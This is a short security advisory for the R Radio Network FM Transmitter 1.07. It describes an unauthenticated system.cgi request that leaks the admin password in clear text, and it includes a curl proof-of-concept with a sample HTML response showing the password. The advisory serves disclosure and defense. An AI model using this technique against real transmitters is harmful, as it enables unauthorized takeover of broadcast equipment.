R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure

Vendor: R Radio Network
Product web page:
Affected version: 1.07

Summary: R Radio FM Transmitter that includes FM Exciter and
FM Amplifier parameter setup.

Desc: The transmitter suffers from an improper access control
that allows an unauthenticated actor to directly reference the
system.cgi endpoint and disclose the clear-text password of the
admin user allowing authentication bypass and FM station setup

Tested on: CSBtechDevice

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2023-5802
Advisory URL:



$ curl -s
<html><head><title>System Settings</title>
Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>